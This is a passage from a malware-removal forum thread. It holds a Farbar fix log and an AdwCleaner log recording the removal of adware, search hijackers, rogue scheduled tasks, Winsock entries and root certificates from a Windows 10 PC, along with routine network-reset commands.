SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM-x32 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=NS&chn=oem&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1450481507&a=1024151&uuid=7e89bdc6-7099-4da4-a7cc-3fa3a69a6cef
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
FF Plugin-x32: @CouponXplorer_5z.com/Plugin -> C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll [2013-11-15] (MindSpark)
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll [No File]
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll [No File]
FF user.js: detected! => C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js [2015-12-18]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch"
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]
Task: {0233CBA7-CF8D-47C8-AAE0-15C5520BF73A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {37FDB4B4-6F58-489C-8711-7C16755A4F51} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {49AB09C4-19DF-4844-B998-467FA3B28176} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {8320D12B-9A3D-426A-BE5D-C9473998057E} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {926DF571-83F8-4B67-B099-E0CDE2A8E9B0} - \DNSKALAMAZOO -> No File <==== ATTENTION
Task: {96B45D1F-D133-4A3A-95CD-6BF63DBC0718} - System32\Tasks\Digital Sites => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B0286D41-AF85-4532-AD16-2B5402FE5DE7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F4362C16-5DD8-45CC-BFF8-0DE20551FD7B} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FC1EC4B9-E68E-48D4-B596-73DA09BA7009} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Digital Sites.job => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:vnhwfkolvwxicefnplfh [0]
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 05 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
CMD: netsh winsock reset catalog
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End
*****************

Restore point was successfully created.
Processes closed successfully.
C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe => No running process found
"C:\Program Files\Phrase Professor191220150009" => not found.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKCR\CLSID\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKCR\Wow6432Node\CLSID\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => key not found.
HKLM\Software\Mozilla\Firefox\Extensions\\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => value removed successfully
C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi => not found.
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{45A8F68D-05A0-4573-8D3D-72E45371DEB8} => value removed successfully
OhufgaFyfves => service not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Price Finder => value removed successfully
C:\Program Files (x86)\Price Finder => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ShopAtHomeWatcher => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ShopAtHomeUpdater => value removed successfully
C:\Users\levilaing\AppData\Roaming\ShopAtHome => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{5a1d0d31-749c-4186-a295-4106e6e7b26a}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5a1d0d31-749c-4186-a295-4106e6e7b26a} => key not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{5a1d0d31-749c-4186-a295-4106e6e7b26a}" => key removed successfully
HKCR\CLSID\{5a1d0d31-749c-4186-a295-4106e6e7b26a} => key not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cf34d395-9ff1-49a0-98a5-8db1636431b1}" => key removed successfully
HKCR\CLSID\{cf34d395-9ff1-49a0-98a5-8db1636431b1} => key not found.
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => value removed successfully
HKCR\CLSID\{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} => key not found.
Firefox "newtab" removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@CouponXplorer_5z.com/Plugin" => key removed successfully
C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll => moved successfully
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Software\MozillaPlugins\tdameritrade.com/thinkorswim" => key removed successfully
C:\Program Files (x86)\thinkorswim\npthinkorswim.dll => not found.
"HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Software\MozillaPlugins\tdameritrade.com/tossc" => key removed successfully
C:\Program Files (x86)\thinkorswim\nptossc.dll => not found.
C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js => moved successfully
Chrome HomePage => removed successfully
Chrome StartupUrls => removed successfully
EraserSvc11511 => service could not remove
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0233CBA7-CF8D-47C8-AAE0-15C5520BF73A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0233CBA7-CF8D-47C8-AAE0-15C5520BF73A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{37FDB4B4-6F58-489C-8711-7C16755A4F51}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37FDB4B4-6F58-489C-8711-7C16755A4F51}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{49AB09C4-19DF-4844-B998-467FA3B28176}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49AB09C4-19DF-4844-B998-467FA3B28176}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8320D12B-9A3D-426A-BE5D-C9473998057E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8320D12B-9A3D-426A-BE5D-C9473998057E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{926DF571-83F8-4B67-B099-E0CDE2A8E9B0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{926DF571-83F8-4B67-B099-E0CDE2A8E9B0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DNSKALAMAZOO" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{96B45D1F-D133-4A3A-95CD-6BF63DBC0718}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96B45D1F-D133-4A3A-95CD-6BF63DBC0718}" => key removed successfully
C:\WINDOWS\System32\Tasks\Digital Sites => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Digital Sites" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B0286D41-AF85-4532-AD16-2B5402FE5DE7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0286D41-AF85-4532-AD16-2B5402FE5DE7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F4362C16-5DD8-45CC-BFF8-0DE20551FD7B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4362C16-5DD8-45CC-BFF8-0DE20551FD7B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FC1EC4B9-E68E-48D4-B596-73DA09BA7009}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC1EC4B9-E68E-48D4-B596-73DA09BA7009}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
C:\WINDOWS\Tasks\Digital Sites.job => moved successfully
C:\ProgramData\Reprise => ":vnhwfkolvwxicefnplfh" ADS removed successfully.
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000005" => key removed successfully

========= netsh winsock reset catalog =========

Initialization Function InitHelperDll in NSHHTTP.DLL failed to start with error code 10107

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

========= bitsadmin /reset /allusers =========

BITSADMIN version 3.0 [ 7.8.10586 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to cancel {9B63404F-FC28-40BD-A05D-BFB19AC65C62}.
{F2D8D534-10B8-407B-B521-A1DDAF9D450E} canceled.
{B514FA58-D29F-4EDC-8EC3-DD5DB6C2F872} canceled.
{BBDBC22C-DEF8-43AB-92EA-13ED16FE8AD7} canceled.
{29D36EC1-3C67-4CEF-BC34-0D0B45E25FE2} canceled.
4 out of 5 jobs canceled.

========= End of CMD: =========

========= netsh advfirewall reset =========

Ok.

========= End of CMD: =========

========= netsh advfirewall set allprofiles state on =========

Ok.

========= End of CMD: =========

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

EmptyTemp: => 91.5 MB temporary data Removed.

The system needed a reboot.

==== End of Fixlog 16:45:35 ====

#7
LLL31

Posted 09 March 2016 - 05:42 PM

Member

Topic Starter
Member
15 posts

# AdwCleaner v5.101 - Logfile created 09/03/2016 at 17:33:35
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [Server]
# Operating system : Windows 10 Home (x64)
# Username : levilaing - LEVISPC
# Running from : C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****

[-] Service Deleted : bsdriver
[-] Service Deleted : cherimoya

***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files (x86)\CouponXplorer_5z
[-] Folder Deleted : C:\Program Files (x86)\CouponXplorer_5zEI
[-] Folder Deleted : C:\Program Files (x86)\dply_en_015020180
[J] Folder Not Deleted : C:\Program Files (x86)\dply_en_015020180
[-] Folder Deleted : C:\ProgramData\1e908d04-21f7-0
[-] Folder Deleted : C:\ProgramData\1e908d04-5b25-1
[-] Folder Deleted : C:\ProgramData\67322837
[-] Folder Deleted : C:\ProgramData\e16f6b56-0817-0
[-] Folder Deleted : C:\ProgramData\e16f6b56-53e7-0
[-] Folder Deleted : C:\ProgramData\{09b42448-312c-0}
[-] Folder Deleted : C:\ProgramData\{0b294307-012c-1}
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DESKTOPPLAY
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\BrowserAir
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\iac
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\CouponXplorer_5z
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\dply_en_015020180
[J] Folder Not Deleted : C:\Users\levilaing\AppData\Local\dply_en_015020180
[-] Folder Deleted : C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\bopakagnckmlgajfccecajhnimjiiedh
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\iac
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\ShopAtHome
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\CouponXplorer_5z
[-] Folder Deleted : C:\Users\levilaing\AppData\LocalLow\CouponXplorer_5zEI
[-] Folder Deleted : C:\Users\levilaing\AppData\Roaming\DigitalSites

***** [ Files ] *****

[-] File Deleted : C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\yahoo_ff.xml
[-] File Deleted : C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\smod.xml
[#] File Deleted : C:\WINDOWS\SysNative\drivers\bsdriver.sys
[#] File Deleted : C:\WINDOWS\SysNative\drivers\cherimoya.sys

***** [ DLLs ] *****

***** [ Shortcuts ] *****

***** [ Scheduled tasks ] *****

[-] Task Deleted : {7E7E0F47-097E-080A-0911-0E7E057A117A}
[-] Task Deleted : {D1996BD7-8FB6-7614-566B-6FE1DB83922B}

***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6
[-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8
[-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74
[-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{67322837}
[-] Key Deleted : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{13119113-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1663C10B-0D55-438D-8496-19A3DBAEC0E4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33119133-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{40A61B9E-B111-46EE-A1F2-C1100192BA48}
[#] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{13119113-0854-469d-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{131a1f72-5c50-43cf-ba3e-3ac75df1188b}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{2238806b-78fe-443b-84c0-3c3d7647b8b8}
[#] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33119133-0854-469d-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{48708b86-3672-46f9-89cf-680f8e807b91}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4ad0f9ab-db53-49fa-9c03-42e6ae1f0c7c}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5bb649a4-1c05-4e18-b7a0-80a0fd29d8d7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{60727c6e-2fcb-4562-8685-7c59f5ea0c16}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{627d42c1-e006-4bf2-bb79-d5fc6e0e01f0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{746c749a-528c-4e31-bc96-848c0d909fb4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{76e9f00f-6852-44fc-b406-bb452f232a1b}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{927c6290-8b1f-4673-9046-658843fea0d0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ae1fb1ef-c142-48d2-8bfa-2730b43e8bea}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{b1c38f5a-506f-4f75-80d7-292903e8f87a}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{b32e7dc1-4d99-4480-844a-06c15df31ed4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{b4fa9c4c-95e4-4f97-ae11-53d374520b46}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ba1ab335-e597-40cf-a2b7-c28c27e10672}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{004F2608-3092-40C2-B880-1FD74DDA6B9A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0CD246B5-EC5A-4601-9A8F-C6D21742BB86}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{15F335C1-5CC0-4786-ABB9-06E727FF2D42}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1B4CF49B-8B69-4A90-8B51-D2088E1EC1BA}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1B749406-A17C-4A1C-9E87-E1E94A0C1A52}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1BCF3F83-F9A0-4075-B0BC-53128BBC228F}
[#] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{23905799-4E4E-457F-8EEA-88A514D38DCA}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2EEF77F9-4F97-4158-9209-A95B38C38EC1}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4025F9A4-91CE-4F20-8486-8A3D95564DB3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{41040243-9338-4C91-9457-AD11F56F48E1}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4B6F98D4-3D4D-4D72-A89B-7B75207AF16D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E60D532-F00E-495B-BD0F-75F1B96CC714}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5128A486-0AED-4F8D-B1C0-1E0FF64CD1D0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{03119103-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{76481128-CCDC-4073-8F65-B06F23B138FC}
[#] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{03119103-0854-469D-807A-171568457991}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{3852AB8E-1CA9-4B29-846F-092CA8D97969}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{4132189A-73C7-4D3E-A8C2-82EF57842DAC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{697FA9F6-DA51-4F3C-8F01-FD5DAAFC18E5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{787ED5A2-18E3-49F2-BCFA-8E2344087D50}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{8221AC18-699F-46C9-8A89-0916CBDB5005}
